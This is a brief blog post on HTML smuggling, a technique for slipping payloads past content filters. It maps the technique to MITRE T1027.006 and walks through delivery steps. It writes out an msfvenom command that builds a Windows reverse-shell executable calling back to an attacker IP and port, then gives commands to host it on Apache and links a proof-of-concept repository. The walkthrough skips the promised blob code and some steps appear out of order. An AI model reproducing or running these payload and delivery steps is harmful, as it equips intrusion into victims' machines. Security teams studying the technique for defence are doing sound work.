Post

HTML Smuggling

Posted Updated
By ashizZz 1 min read

HTML-Smuggling

HTML Smuggling is an evasive payload delivery method that helps an attacker smuggle payload past content filters and firewalls by hiding malicious payloads inside of seemingly benign HTML files. This is possible by using JavaScript blobs and the HTML5 download attribute used with the anchor tag. This article demonstrates the methodology and two such readily available scripts that perform HTML smuggling.

MITRE Mapping

  • MITRE TACTIC: Defense Evasion (TA0005)
  • MITRE Technique ID: Obfuscated Files or Information (T1027)
  • MITRE SUB ID: HTML Smuggling (T1027.006)

Let’s start with the basics. In HTML5, if we want a user to download a file hosted on our server, we can do that by using the anchor tag.

1

    <a href=/payload.exe download=payload.exe>Download Here</a>

For that, let’s first create a payload using msfvenom and copy it in our apache webroot directory.

1

    msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.0.89 LPORT=1234 -f exe > payload.exe

1

    cp payload.exe /var/www/html

Then we copy this into the apache webroot and start the apache server

1
2
3
4
5

    cp index.html /var/www/html
    
    cd /var/www/html
    
    service apache2 start

But in order to supply this into our blob as a buffer, we need a single string with no enters. This fixing be done manually by copying this output in notepad and removing enters or you could follow our alternate approach by going to base64.guru website. Here, upload your payload and the converted base64 shall be given in a single line.

GitHub Repoitory for POC

https://github.com/ashizZz/HTML-Smuggling

Defense Evasion
HTML Smuggling (T1027.006) Obfuscated Files or Information (T1027) Delivery
This post is licensed under CC BY 4.0 by the author.